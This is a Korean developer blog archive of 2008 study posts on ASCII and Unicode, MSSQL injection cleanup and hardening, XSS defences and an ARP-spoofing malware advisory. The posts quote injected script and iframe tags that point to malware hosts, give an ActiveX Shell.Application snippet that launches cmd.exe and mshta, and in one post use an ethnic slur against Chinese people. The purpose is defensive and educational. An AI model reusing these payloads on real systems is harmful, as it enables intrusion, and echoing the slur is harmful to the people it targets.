태그목록
- MySQL/MariaDB 아키텍처 – 메모리 할당 및 사용 구조
- MSSQL 트리거
- adInteger
- layer center
- jquery layer
- Tomcat/conf/context.xml
- asp isEmpty isNumeric
- tomcat cache 설정
- MySql Primary Key
- tomcat context
- asp getrow
- div background 변경
- autocomplete form
- clj-soap
- mysql
- MS SQL 와 Mysql 비교
- getElementsByName value
- MariaDB
- slidesjs 슬라이드
- 영문자만
- concat || MSSQL
- toFixed 소수점자리수 소수점 자릿수
- MySQL/MariaDB Memory 관련 설정 변수
- autocomplete form html5
- 한글만
- adCurrency
- adVarchar
- asp 숫자형체크
- JQuery Accordion Widget
- Memory 설정 변수
공지사항
최근에 올라온 글
최근에 달린 댓글
최근에 받은 트랙백
링크
- phpbb.
- myid.
- 스프링노트포럼.
- internetindex_경쟁사순위.
- 레몬펜.
- 통계청.
- 너와나의이야기_IT이야기.
- 태그 100개.
- 파이어폭스.
- IE 브라우져 버전별 테스트 _브라우저 도구 -부가기능….
- iPhone SDK Examples.
- 애니메이션과 함께.
- 아는 것이 좋은 것이다..
- 선형회귀분석을 통한 머신러닝의 기본 개념 이해.
- Teachable Machine.
- Graphviz - Graph Visualization….
- 모두를 위한 머신러닝/딥러닝 강의.
- 머신러닝 단기집중과정.
- [파이썬][머신러닝][분류][KNN] forge 데이터….
- [파이썬][머신러닝][분류][KNN] 유방암 악성 ….
- Python Regression, Tree.
- 크롬버전별 설치 v.2.4.
글 보관함
'Develope/Study'에 해당되는 글 11건
- 2008.11.10 SQL Injection
- 2008.11.10 아스키 유니코드
- 2008.11.07 MSSQL 보안
- 2008.11.07 SQL Injection 해킹 공격 :: DB 복구 방법
- 2008.11.06 [보안] Shell.Application ActiveXObject를 이용한 해킹기법
- 2008.11.06 SQL Injection 스크립트삽입 해킹 방지책! +_+ Tip And Taq
- 2008.11.06 ARP Spoofing 공격 악성코드 주의 [ Insecure Remote File Include ]
- 2008.11.04 포털 게시판 통한 악성코드 유포 확인
- 2008.10.20 결합 컬럼 인덱스와 단일 컬럼 인덱스
- 2008.06.03 프로그래머를 위한 사용자 인터페이스 설계론 _ 제1부: 환경을 통제할 수 있는 사용자는 행복하다
==> 10진수지만 저장은 2진수로 저장한다.
8진수 저장시 int c = 012; => 10진수로는 10이다. 012는 8+2를 의미한다. 8진수니깐
16진수 저장시 int b = 0xa; => 10진수로는 10이다. 0xa는 10을 의미한다. 16진수니까.
진수가 달라도 내부적으로 2진수니까 연산이 가능하다.
비트단위연산자
&연산자 : 비트단위 AND int c = a&b;
|연산자 : 비트단위 OR a|b
^연산자 : XOR a^b
~연산자 : NOT ~a
<<연산자 : 왼쪽으로 이동 a<<2
>>연산자 : 오른쪽으로 이동 a>>2
ASCII(미국표준협회 ANSI에 의해 정의)아스키코드 : 문자 A는 숫자 65, 문자 B는 숫자 66 char변수는 -128~127사이의 정수를 저장할 수 있다. 그러나 기본적으로 문자를 저장하기 위해 사용한다. 아스키코드는 컴퓨터가 문자를 표현하지 못하기 때문에 컴퓨터의 2진수를 문자로 표현하기 위해 만든 규약이다.
표현 : 따옴표 ' ' 를 이용해서 표현한다. char ch1 = 'A'; (컴이 아스키코드표 참조해서
A가 65로 정의되었음을 알게 되고 문자 ch1 변수에 숫자65를 2진수로 저장한다.)
printf로 char 출력할 때 %d로 하면 저장된 숫자가 출력되고 %c로 하면 문자가 출력된다.
u or U : unsigned int 사용법 304U
l or L : long 304L
ul or UL : unsigned long 304UL
f or F : float 3.15F
l or L : long double 3.15L
Here is the ASCII Code Table.
0000 0001 001 001 01 SOH 헤딩 시작(Start Of Header)
0000 0010 002 002 02 STX 본문 시작, 헤더 종료(Start of TeXt)
0000 0011 003 003 03 ETX 본문 종료(End of TeXt)
0000 0100 004 004 04 EOT 전송 종료, 데이터 링크 초기화(End Of Transmission)
0000 0101 005 005 05 ENQ 응답 요구(ENQuiry)
0000 0110 006 006 06 ACK 긍정응답(ACKnowledge)
0000 0111 007 007 07 BEL 경고음(BELl)
0000 1000 008 010 08 BS 박스페이스(BackSpace)
0000 1001 009 011 09 HT 수평 탭(Horizontal Tab)
0000 1010 010 012 0A LF 개행(Line Feed)
0000 1011 011 013 0B VT 수직 탭(Vertical Tab)
0000 1100 012 014 0C FF 다음 페이지(Form Feed)
0000 1101 013 015 0D CR 복귀(Carriage Return)
0000 1110 014 016 0E SO 확장문자 시작(Shift Out)
0000 1111 015 017 0F SI 확장문자 종료(Shift In)
0001 0000 016 020 10 DLE 전송제어 확장(Data Link Escape)
0001 0001 017 021 11 DC1 장치 제어
0001 0010 018 022 12 DC2 장치 제어
0001 0011 019 023 13 DC3 장치 제어
0001 0100 020 024 14 DC4 장치 제어
0001 0101 021 025 15 NAK 부정응답(Negative AcKnowledge)
0001 0110 022 026 16 SYN 동기(SYNnchronous idle)
0001 0111 023 027 17 ETB 전송블록 종료(End of Transmission Block)
0001 1000 024 030 18 CAN 무시(CANcel)
0001 1001 025 031 19 EM 매체 종료(End of Medium)
0001 1010 026 032 1A SUB 치환(SUBstitute)
0001 1011 027 033 1B ESC 제어기능 추가(ESCape)
0001 1100 028 034 1C FS 파일경계 할당(File Seperator)
0001 1101 029 035 1D GS 레코드 그룹경계 할당(Group Seperator)
0001 1110 030 036 1E RS 레코드경계 할당(Record Seperator)
0001 1111 031 037 1F US 장치경계 할당(Unit Seperator)
0010 0000 032 040 20 SPC 스페이스(SPaCe)
0010 0001 033 041 21 !
0010 0010 034 042 22 "
0010 0011 035 043 23 #
0010 0100 036 044 24 $
0010 0101 037 045 25 %
0010 0110 038 046 26 &
0010 0111 039 047 27 '
0010 1000 040 050 28 (
0010 1001 041 051 29 )
0010 1010 042 052 2A *
0010 1011 043 053 2B +
0010 1100 044 054 2C ,
0010 1101 045 055 2D -
0010 1110 046 056 2E .
0010 1111 047 057 2F /
0011 0000 048 060 30 0
0011 0001 049 061 31 1
0011 0010 050 062 32 2
0011 0011 051 063 33 3
0011 0100 052 064 34 4
0011 0101 053 065 35 5
0011 0110 054 066 36 6
0011 0111 055 067 37 7
0011 1000 056 070 38 8
0011 1001 057 071 39 9
0011 1010 058 072 3A :
0011 1011 059 073 3B ;
0011 1100 060 074 3C <
0011 1101 061 075 3D =
0011 1110 062 076 3E >
0011 1111 063 077 3F ?
0100 0000 064 100 40 @
0100 0001 065 101 41 A
0100 0010 066 102 42 B
0100 0011 067 103 43 C
0100 0100 068 104 44 D
0100 0101 069 105 45 E
0100 0110 070 106 46 F
0100 0111 071 107 47 G
0100 1000 072 110 48 H
0100 1001 073 111 49 I
0100 1010 074 112 4A J
0100 1011 075 113 4B K
0100 1100 076 114 4C L
0100 1101 077 115 4D M
0100 1110 078 116 4E N
0100 1111 079 117 4F O
0101 0000 080 120 50 P
0101 0001 081 121 51 Q
0101 0010 082 122 52 R
0101 0011 083 123 53 S
0101 0100 084 124 54 T
0101 0101 085 125 55 U
0101 0110 086 126 56 V
0101 0111 087 127 57 W
0101 1000 088 130 58 X
0101 1001 089 131 59 Y
0101 1010 090 132 5A Z
0101 1011 091 133 5B [
0101 1100 092 134 5C \
0101 1101 093 135 5D ]
0101 1110 094 136 5E ^
0101 1111 095 137 5F _
0110 0000 096 140 60 `
0110 0001 097 141 61 a
0110 0010 098 142 62 b
0110 0011 099 143 63 c
0110 0100 100 144 64 d
0110 0101 101 145 65 e
0110 0110 102 146 66 f
0110 0111 103 147 67 g
0110 1000 104 150 68 h
0110 1001 105 151 69 i
0110 1010 106 152 6A j
0110 1011 107 153 6B k
0110 1100 108 154 6C l
0110 1101 109 155 6D m
0110 1110 110 156 6E n
0110 1111 111 157 6F o
0111 0000 112 160 70 p
0111 0001 113 161 71 q
0111 0010 114 162 72 r
0111 0011 115 163 73 s
0111 0100 116 164 74 t
0111 0101 117 165 75 u
0111 0110 118 166 76 v
0111 0111 119 167 77 w
0111 1000 120 170 78 x
0111 1001 121 171 79 y
0111 1010 122 172 7A z
0111 1011 123 173 7B {
0111 1100 124 174 7C |
0111 1101 125 175 7D }
0111 1110 126 176 7E ~
0111 1111 127 177 7F DEL 삭제(DELete)
UNICODE HANGUL SYLLABLES
그건 아스크 코드가 아니라 유니코드라고 합니다. 그리고 ㄱ,ㄴ이런걸로 있는게 아니라 하나의 가나다라 이런식으로 되어 있구요.. 유니코드표는 아래와 같습니다. 이거 카피해서 메모장에 넣구요.. 하나의 음씩 찾기해서 해보세요.. ^^
만약 "감사합니다"를 쓸경우 아래와 같습니다.
44032: 가각갂갃간갅갆갇갈갉갊갋갌갍갎갏감갑값갓갔강갖갗갘같갚갛 :44059
[출처] 아스키코드 유니코드 표|작성자 좋은생각
Security+Guide+MS+SQL+Server+2000.pdf-- 테스트환경.
CREATE TABLE Test
(A varchar(1000) NULL)
GO
INSERT Test (A)
VALUES ('asdfdas.jpg<script src=http://dae3.cn></script><script src=http://dae3.cn></script><script src=http://dae3.cn></script><script src=http://dae3.cn></script><script src=http://dae3.cn></script>')
GO
INSERT Test (A)
VALUES ('asdfadsf.zip<script src=http://dae3.cn></script><script src=http://dae3.cn></script><script src=http://dae3.cn></script><script src=http://dae3.cn></script><script src=http://dae3.cn></script>')
GO
INSERT Test (A)
VALUES ('dfdasfdasf.jpgsdkaf')
GO
INSERT Test (A)
VALUES ('dsfasfdasf.zipdedfg')
GO
SELECT * FROM Test
GO
/*
asdfdas.jpg<script src=http://dae3.cn></script><script src=http://dae3.cn></script><script src=http://dae3.cn></script><script src=http://dae3.cn></script><script src=http://dae3.cn></script>
asdfadsf.zip<script src=http://dae3.cn></script><script src=http://dae3.cn></script><script src=http://dae3.cn></script><script src=http://dae3.cn></script><script src=http://dae3.cn></script>
dfdasfdasf.jpgsdkaf
dsfasfdasf.zipdedfg
*/
/* 반복되는스크립트가일정할때. 컬럼이TEXT 타입인경우, VARCHAR 으로형변환후함.
SQL Server 2000 의경우VARCHAR(8000) 이최대길이이므로, 최대길이는비교해보고해야함
*/
UPDATE Test
SET A = REPLACE(CONVERT(VARCHAR(8000),A) , '<script src=http://dae3.cn></script>', '')
-- 반복되는스크립트가일정하지않고, 특정파일뒤에만짜르고싶은경우. 컬럼이TEXT 일경우
UPDATE Test
SET A = LEFT(CONVERT(VARCHAR(8000),A),CHARINDEX( '.jpg',CONVERT(VARCHAR(8000),A))+3)
WHERE CHARINDEX( '.jpg',CONVERT(VARCHAR(8000),A)) > 0
UPDATE Test
SET A = LEFT(CONVERT(VARCHAR(8000),A),CHARINDEX( '.zip',CONVERT(VARCHAR(8000),A))+3)
WHERE CHARINDEX( '.zip',CONVERT(VARCHAR(8000),A)) > 0
-- 반복되는스크립트가일정할때. 컬럼이그냥일반char , varchar 등일경우.
UPDATE Test
SET A = REPLACE(A , '<script src=http://dae3.cn></script>', '')
-- 반복되는스크립트가일정하지않고, 특정파일뒤에만짜르고싶은경우.
UPDATE Test
SET A = LEFT(A,CHARINDEX( '.jpg',A)+3)
WHERE CHARINDEX( '.jpg',A) > 0
UPDATE Test
SET A = LEFT(A,CHARINDEX( '.zip',A)+3)
WHERE CHARINDEX( '.zip',A) > 0
/*
asdfdas.jpg
asdfadsf.zip
dfdasfdasf.jpg
dsfasfdasf.zip
*/
|
|
|
이 해킹기법은 순수한 연구목적으로 공개하며, 악의적인 사용을 방지하기 위해 코드는 최소한으로만 공개합니다.
최근에 해킹 기법중에서 MS IE를 이용해서 백도어를 설치하는 해킹이 많습니다. 그중에서 가장 많이 사용되는 방법이 ActiveXObject 중에서 "Shell.Application" 메소드를 사용하는 방법이 있습니다. 특히 중국 해커 애들이 이런 것을 애용하는 경우가 많습니다. 이 메소드는 인터넷 영역에서 인트라넷 영역 즉 하드디스크로 쓰기가 가능하기 때문에 백도어 설치에 아주 좋은 취약점이 됩니다.
따라서 절대로 의심이 가능 웹 사이트는 방문하지 마시고 부득이 웹사이트를 방문할 때는 IE의 보안 탭에서 Active 스크립트를 비활성 시키시면 악의적인 실행을 막을 수 있습니다.
사용예)
function ShellExecuteExe()
{ ShellApp = new ActiveXObject("Shell.Application"); 또는 아래와 같이 cmd를 실행시키는 방법을 쓰거나,
ShellApp.ShowBrowserBar("{C4EE31F3-4768-11D2-BE5C-00A0C9A83DA1}", true);
ShellApp.ShellExecute("cmd.exe");
제어판을 실행하도록 만들 수 있습니다.
ShellApp.ShellExecute("rundll32.exe", "shell32.dll,Control_RunDLL sysdm.cpl,,1")
ShellApp.ShellExecute("rundll32.exe", "shell32.dll,Control_RunDLL netcpl.cpl,,1"); } ShellApp.ShellExecute("c://windows//system32//mshta.exe","C://xx.hta") |
노후한 장비와 WinNT5.1xp4 노후한SQL2K 등을 쓰면서 업그레이드하고 싶지만 사정이 안되는 경우 -_-++
오늘도 이렇게 커넥트 되어 들어오는 짱개놈들 -_-;;
웹로그와 apnic 를 뒤진 결과 222.176.0.0 - 222.183.255.255 여기서 222.118.0.142 이녀석이 원인 -_-!!
어쨋든 일단 처리는 넘기고~
온갖 구글검색과 네이버지식IN SQL.PE.KR 을 참조하여 나름 방지 쿼리를 완성했슴미~~
1. 일단 이미 들어온 짱개놈들~~ 삭제쿼리는 다음과 같이
DECLARE @T varchar(255), @C varchar(255)
DECLARE Table_Cursor CURSOR FOR
SELECT a.name, b.name
FROM sysobjects a, syscolumns b
WHERE a.id = b.id AND a.xtype = 'u' AND
(b.xtype = 99 OR
b.xtype = 35 OR
b.xtype = 231 OR
b.xtype = 167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T, @C
WHILE (@@FETCH_STATUS = 0) BEGIN
EXEC(
'update ['+@T+'] set ['+@C+'] = replace(convert(varchar(8000),['+@C+']),''<script src=http://s.ardoshanghai.com/s.js></script>'','''')
where ['+@C+'] like ''%<script%'''
)
FETCH NEXT FROM Table_Cursor INTO @T, @C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
exec sp_helpfile;
빨간부분은 해당 들어온 스크립트를 삽입!!
2. 다음은 SQL Injecttion 방지를 위하여~~~ 여기저기 참조하여만들어본 쿼리~~
Use master
IF OBJECT_ID('[dbo].[xp_cmdshell]') IS NOT NULL BEGIN
exec sp_dropextendedproc 'xp_cmdshell'
END
go
Use master
exec sp_dropextendedproc 'xp_dirtree'
exec sp_dropextendedproc 'xp_enumgroups'
exec sp_dropextendedproc 'xp_fixeddrives'
exec sp_dropextendedproc 'xp_loginconfig'
exec sp_dropextendedproc 'xp_enumerrorlogs'
exec sp_dropextendedproc 'xp_getfiledetails'
exec sp_dropextendedproc 'Sp_OACreate'
exec sp_dropextendedproc 'Sp_OADestroy'
exec sp_dropextendedproc 'Sp_OAGetErrorInfo'
exec sp_dropextendedproc 'Sp_OAGetProperty'
exec sp_dropextendedproc 'Sp_OAMethod'
exec sp_dropextendedproc 'Sp_OASetProperty'
exec sp_dropextendedproc 'Sp_OAStop'
exec sp_dropextendedproc 'Xp_regaddmultistring'
exec sp_dropextendedproc 'Xp_regdeletekey'
exec sp_dropextendedproc 'Xp_regdeletevalue'
exec sp_dropextendedproc 'Xp_regenumvalues'
exec sp_dropextendedproc 'Xp_regread'
exec sp_dropextendedproc 'Xp_regremovemultistring'
exec sp_dropextendedproc 'Xp_regwrite'
drop procedure sp_makewebtask
go
Use master
exec sp_addextendedproc 'xp_cmdshell', 'xplog70.dll'
exec sp_addextendedproc 'xp_dirtree', 'xpstar.dll'
exec sp_addextendedproc 'xp_enumgroups', 'xplog70.dll'
exec sp_addextendedproc 'xp_fixeddrives', 'xpstar.dll'
exec sp_addextendedproc 'xp_loginconfig', 'xplog70.dll'
exec sp_addextendedproc 'xp_regaddmultistring', 'xpstar.dll'
exec sp_addextendedproc 'xp_regdeletekey', 'xpstar.dll'
exec sp_addextendedproc 'xp_regdeletevalue', 'xpstar.dll'
exec sp_addextendedproc 'xp_regread', 'xpstar.dll'
exec sp_addextendedproc 'xp_regremovemultistring', 'xpstar.dll'
exec sp_addextendedproc 'xp_regwrite', 'xpstar.dll'
exec sp_addextendedproc 'xp_enumerrorlogs', 'xpstar.dll'
exec sp_addextendedproc 'xp_getfiledetails', 'xpstar.dll'
exec sp_addextendedproc 'xp_regenumvalues', 'xpstar.dll'
go
REVOKE EXECUTE ON xp_regread FROM public
REVOKE EXECUTE ON xp_instance_regread FROM public
REVOKE EXECUTE ON dbo.sp_runwebtask FROM public
go
Use msdb
REVOKE EXECUTE ON sp_add_job FROM public
REVOKE EXECUTE ON sp_add_jobstep FROM public
REVOKE EXECUTE ON sp_add_jobserver FROM public
REVOKE EXECUTE ON sp_start_job FROM public
REVOKE ALL ON dbo.mswebtasks FROM public
REVOKE EXECUTE ON sp_enum_dtspackages FROM public
REVOKE EXECUTE ON sp_get_dtspackage FROM public
REVOKE EXECUTE ON sp_get_sqlagent_properties FROM public
go
Use master
dbcc xp_cmdshell(free)
dbcc xp_dirtree(free)
dbcc xp_regdeletekey(free)
dbcc xp_regenumvalues(free)
dbcc xp_regread(free)
dbcc xp_regwrite(free)
dbcc sp_makewebtask(free)
dbcc sp_adduser(free)
go
Use master
DENY EXECUTE ON [master].[dbo].[xp_subdirs] TO [guest] CASCADE
DENY EXECUTE ON [master].[dbo].[xp_dirtree] TO [guest] CASCADE
DENY EXECUTE ON [master].[dbo].[xp_availablemedia] TO [guest] CASCADE
DENY EXECUTE ON [master].[dbo].[xp_regwrite] TO [guest] CASCADE
DENY EXECUTE ON [master].[dbo].[xp_regread] TO [guest] CASCADE
DENY EXECUTE ON [master].[dbo].[xp_regaddmultistring] TO [guest] CASCADE
DENY EXECUTE ON [master].[dbo].[xp_regdeletekey] TO [guest] CASCADE
DENY EXECUTE ON [master].[dbo].[xp_regdeletevalue] TO [guest] CASCADE
DENY EXECUTE ON [master].[dbo].[xp_regremovemultistring] TO [guest] CASCADE
DENY EXECUTE ON [master].[dbo].[xp_regaddmultistring] TO [guest] CASCADE
DENY EXECUTE ON [master].[dbo].[xp_fileexist] TO [guest] CASCADE
DENY EXECUTE ON [master].[dbo].[xp_fixeddrives] TO [guest] CASCADE
DENY EXECUTE ON [master].[dbo].[xp_getfiledetails] TO [guest] CASCADE
go
3. 다음은 ASP 관련 처리가 돼겠다~!
페이지상단처리
인젝션 유형: 제일많이 쓰는 내용이 " -- ", 혹은 " ' " 혹은 " ; "
이 세개의 특수문자이기 때문에 쿼리스트링에 해당 문자열이 포착되면은
에러페이지로 이동됩니다
1) 일반형식
Function RequestCheck(string)
If Instr(string,"'")>0 or Instr(string,"--") or Instr(string,";") then
Response.redirect "/error.asp"
else
str = string
End if
RequestCheck = str
End Function
Qri = Request.ServerVariables("Query_String")
Call RequestCheck(Qri)
2) 폼형식
Function FormCheck(string,opt)
If Instr(string,"--") or Instr(string,";") then
if opt=1 then
str = Replace(str,"--","..")
str = Replace(str,";",":")
elseif opt=2 then
Response.redirect "/error.asp"
end if
else
str = string
End if
FormCheck = str
End Function
subject = FormCheck(Request.Form("subject"),1)
opt의 경우 1은 .. 꼭 받아야할 정보이면, 리플레이스로 해서, 데이타 입력을 받고 (text타입인경우)
2는 ... 특수문자가 들어갈 확률이 없는데, 들어온경우로 에러를 내며, 페이지종료
3) 웹 문서 상의 쿼리문은 저장 프로시져로 항상 처리!
위 3가지 유형별로 처리만 일단 해주면 인젝션봇으로 아무생각없이 막 들어오는 짱개넘들을 방지할 수는 있을지도
근본적인 해결은 항상 최신 OS 최신 SQL 최신 패치 프로그래밍소스의 개발유지 등이 필요하겠지만~~~
[출처] SQL Injection 스크립트삽입 해킹 방지책! +_+|작성자 어진아씨
등장하여 주의가 필요함
o 특히 네트워크 관리자는 내부 네트워크에서 ARP Spoofing 공격 여부를 주기적으로 탐지하고
공격 근원지를 파악하여 관련 악성코드가 실행 및 다운로드 되지 않도록 주의가 필요함
□ 전파방법
- 해당 악성코드 감염시 네트워크에 존재하는 호스트 및 게이트웨이를 대상으로 ARP Reply를
지속적으로 보냄
- 게이트웨이의 MAC 주소와 공격대상 호스트의 MAC 주소를 위조하는 ARP Reply를 지속적으로
보냄
하여 모든 패킷을 모니터링 및 변조 할 수 있음
- ARP Spoofing공격으로 정상 호스트가 웹 접속 시 감염 PC는 패킷을 가로채고 아래와 같은
정보를 삽입해 악성코드 유포지 사이트로 유도
안된 사이트는 googleons.exe에 감염됨
- MS06-014
- MS07-017
- MS07-027
□ 악성행위 (googleons.exe)
o 동일 네트워크에 존재하는 PC들의 HTTP 통신 패킷 변조
"<iframe src=http://down.online[생략].net/page/image/zzh.htm height=0></iframe></IFRAME P ?<></IFRAME IFRAME <>" 삽입
- "<iframe src=http://down.online[생략].net/page/image/pd.htm height=0></iframe></IFRAME P ?<></IFRAME IFRAME <>"
- C:\Document and Settings\[계정]\Local Settings\Temp\
autoexec.bat (down.exe 최초 감염 악성코드, googleons.exe를 다운로드 및 실행)
googleons.exe
disocoo.exe (실행뒤 삭제)
npptools.dll
Packet.dll
WanPacket.dll
yahoons.exe (실행뒤 삭제)
- C:\windows\system32\ (yahoons.exe 실행에 의해 생성되는 파일들)
dllhost32.exe
mh104.dll
moyu103.dll
mosou.exe
mydata.exe
nwizwmgjs.exe
nwizwmgjs.dll
nwizzhuxians.exe
nwizzhuxians.dll
RAV00xx.exe등 다수
- HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
- 이름 : svc
- 파일 이름 : googleons.exe
□ 감염여부 확인 및 치료방법
- L3 또는 라우터에서 감염 PC 확인
중복 MAC 주소 IP 확인 (악성코드 감염 IP 확인)
※ krcert 홈페이지->기술문서->ARP Spoofing 공격 및 대책 참고
전체 네트워크 Ping 스캔
중복 MAC 주소 IP 확인
※ krcert 홈페이지->기술문서->ARP Spoofing 공격 및 대책 참고
C:\Document and Settings\[계정]\Local Settings\Temp\googleons.exe 존재여부 확인
googleons.exe 프로세스 실행여부 확인 [아래 치료방법 참조]
- C:\Document and Settings\[계정]\Local Settings\Temp\ 하위 악성코드들 삭제
- 윈도우 시스템 폴더에 존재하는 악성코드들 삭제
- googleons.exe 프로세스 끝내기
"Ctrl" + "Alt" + "Del" 클릭 후 프로세스 메뉴에서 googleons.exe 프로세스 종료
- 레지스트리 삭제
googleons 재시작 레지스트리 삭제
시작 → 실행 선택, "regedit" 입력 후 악성코드가 생성한 아래의 레지스트리 삭제
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
. 기타 악성코드 레지스트리 삭제
시작 → 실행 선택, "regedit" 입력 후 악성코드가 생성한 아래의 레지스트리 삭제
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
□ 예방 방법
- 윈도 OS 최신 패치 실시
(서울=연합뉴스) 조성흠 기자 = 포털 사이트 게시판이 악성코드 유포 경로로 악용될 수 있다는 사실이 확인돼 주의가 요구된다.
18일 관련 업계에 따르면 최근 한 누리꾼이 중국 사이트에서 구한 신종 XSS(크로스사이트스크립팅) 스크립트를 다수의 네이버 카페 게시판에 올려 이를 실행시키는 데 성공했다.
XSS는 인터넷 상에서 악성코드를 유포하거나 컴퓨터 실행기록인 쿠키파일을 빼낼 때 사용되는 흔한 해킹 기법이다.
이용자가 이 XSS 스크립트가 심어진 게시물을 클릭하면 자신도 모르는 새 악성코드에 감염되거나 쿠키파일이 해커에게 넘어갈 수 있다.
특히 쿠키파일에는 이용자 아이디와 비밀정보가 포함돼 있는 경우가 많아 개인정보 유출의 위험이 큰 것이 사실이다.
암호화가 된 경우라도 간단한 조작을 거치면 원래 정보를 알아낼 수 있고 이를 위한 별도의 프로그램 또한 인터넷 상에서 쉽게 구할 수 있다.
실제로 이 누리꾼은 이를 이용해 자신이 만든 팝업창을 이용자의 컴퓨터에 띄우는 데 성공한 것으로 알려졌다. 네이버가 꾸준히 이들 XSS 스크립트에 대한 필터링을 하고 있지만 이 누리꾼은 신종 스크립트의 경우 방어시스템이 업데이트 되는데 시간이 걸리는 점을 악용한 것이다.
누리꾼의 제보를 받은 네이버는 해당 스크립트를 방어시스템에 업데이트하고 추가로 게시되지 못하도록 차단했다.
보안 업계에서는 네이버뿐만 아니라 국내외 모든 인터넷 게시판이 이 같은 취약점을 갖고 있다고 지적했다. 새로 발견된 XSS 스크립트를 꾸준히 방어시스템에 업데이트 하더라도 해커가 이를 다시 조작하면 손쉽게 시스템을 피해갈 수 있기 때문이다.
한 보안 전문가는 "이번 사례는 해커 개인의 개별 이용자에 대한 공격으로, 시스템 자체에 대한 해킹과는 전혀 별개의 사안"이라며 "업체들이 시스템적으로 이 같은 사례를 막기 위해 꾸준히 노력한다 해도 근본적으로 인터넷 게시판 서비스가 갖고 있는 한계가 있다"고 말했다.
그는 또한 "개인 이용자들이 경각심을 갖고 백신프로그램을 사용하는 등 보안수칙을 준수하는 것이 중요하다"고 덧붙였다.
* 크로스 사이트 스크립트란 ?
공격자가 보낸 코드를, 그 페이지를 열람한 다른 유저에게 스크립트로 실행시키는 것이 「크로스 사이트 스크립팅(XSS라고 생략해서 쓰기도 있다 )」아다. 유저의 입력 데이터를 표시하는 형식으로 되어 있는 게시판과 같은 Web어플리케이션에서 발생하기 쉬운 취약성이다.
Web어플리케이션에서 입력 데이터의 충분한 검증이 이루어지지 않을 때, 공격자는 악의가 있는 코드를 다른 유저가 열람하는 장소에 배치할 수가 있다. 그 페이지를 열람한 다른 유저는, 그 스크립트를 신뢰할 수 있는 것인지 아닌지를 판단할 방법이 없기 때문에 그대로 실행해 버린다. 그 결과 간단하게 그 유저가 사이트내에서 사용하고 있었던 Cookie나 세션 정보를 훔칠 수 있다.
이 공격은 성질상, 광범위하게 퍼지기 쉽다. 게시판 사이트 등 자신이 기입한HTML을 다른 사람이 열람할 수 있는 사이트를 이용해 크로스 사이트 스크립팅을 걸 수가 있다. 다음 폼은 열람자에게 다이얼로그 박스를 표시해주기 위한 스크립트이다.
 |
| 그림5 열람자에게 다이알로그 박스를 표시해주는 스크립트 |
이렇게 기입한 후 사이트에 스크립트의 실행을 허가하는 브라우저로 액세스하면, 다음과 같은 다이얼로그가 표시된다..
이 예에서는 단순한 다이알로그 박스 표시의 스크립트이지만, 이 형식을 응용해서 공격자가 준비한 Web사이트에 액세스 시켜 Cookie 송신등을 실행시킬 수가 있다.
어플리케이션쪽에서 크로스 사이트 스크립팅을 방어하려면, 송신된 리퀘스트의 sanitizing이 효과적이다. sanitizing은 어떤 환경에서 제어 문자을 제어 문자가 아닌 단순한 문자로서 취급하게 하는 것이다. 위의 경우에서는 송신된 내용을 서버에 기입하기 전, 혹은 리스펀스 데이터를 돌려줄 때에 「<」를 「<, 「>」를 「>」으로 변환해 버리면 스크립트는 실행되지 않는다. 그리고 기호같이 사용할 수 있는 문자의 종류를 제한해 버리는 것도 효과적인 대처법이 될 수 있다.
이번에는 XSS공격에 대하여 몇자 적어 봅니다.
Cross Site Scripting은 웹사이트에 접속한 사용자가 공격의 대상이 되는 기법으로, 사용자의 입력 값에 악의적인 Javascript code를 삽입하여 웹 페이지를 로드 함으로 현재 페이지를 열람하는 사용자에게 스크립트를 실행시키도록 하는 것입니다. 그러므로 사용자의 입력을 받는 모든 사이트에서 XSS공격이 일어날 가능성이 있습니다. 특히 다음과 같은 상황에서 자주 발생합니다.
1. 검색할 단어를 입력하는 Input 영역에서 검색단어를 입력한 후, 검색 결과와 함께 입력한 검색 키워드를 다시 보여주는 경우
2. 사용자 입력 폼에 입력한 내용들을 다시 출력하는 경우
3. 게시판에서 쓴 내용들을 열람하는 경우
공격자는 XSS를 통해서 사용자의 쿠키를 변경하거나 탈취할 수 있으며 정상적인 사용자에 대해서 잘못된 정보를 보내줄 수도 있습니다. 이러한 XSS는 최근 Phishing기법에 많이 사용되는데 악의적인 사용자가 변조된 입력 폼을 제공함으로 다른 사용자의 정보가 노출되고 있습니다. 또한 자바 스크립트 코드뿐만 아니라 object들을 사용자의 브라우저상에서 실행시킴으로 광고팝업이나 브라우저를 변조할 수 있습니다.
XSS 공격을 방어하는 가장 좋은 방법은 어플리케이션이 모든 header 들, cookie, query string, form field, hidden field (예를 들면, 모든 parameter 들) 에 대해 유효성 검사를 실시하는 것입니다. 사용자의 입력이 화면에 출력되어 나오는 경우, 사용자의 입력 값을 HTML Entity로 변환시켜야만 합니다. 또한 위의 태그들을 HTML으로 인식시키지 않기 위해 스크립트에서는 함수를 지원합니다. 그리고 공개 게시판의 경우, HTML 형식을 지원하는 경우 XSS의 잠재적인 위험성이 존재하므로, 이를 중지할 필요가 있습니다.
기본 대책
(1) ASP Script
사용자의 입력에 대해 Server.HTMLEncode함수를 사용하여 HTML태그를 비활성화 시킵니다.
‘ Server.HTMLEncode함수를 사용하여 HTML태그를 변환합니다.
<%= Server.HTMLEncode(“<script>alert(“XSS Test”);<script>”) %>
‘ 위의 결과 tag들이 비활성화 됩니다.
(2) JSP Script
HTML코드의 시작을 알리는 ‘<’ 에 대해서 < 으로 변환시키는 방법입니다.
/% less than (<) character 를 < 으로 변환시킵니다. %/
String userInput = request.getParameter(“keyword”);
user_input = user_input.replaceAll(“’”, “\’”);
(3) PHP Script
PHP의 내장함수 가운데 입력 문자열에 대해서 HTML코드를 변환시켜주는 htmlentities()를 사용하여 XSS를 막습니다.
<?
$str = "A 'quote' is <b>bold</b>";
echo htmlentities($str);
// 출력: A 'quote' is <b>bold</b>
?>
이것또한 간단 하게 기본적인 부분만 처리 해주어도 상당부분 방어가 가능합니다.
조금 귀찮더라도 이정도 처리는 해주어야 하지 않을까 합니다.
[출처] XSS 스크립트 (크로스사이트스크립팅)|작성자 syberhiphop
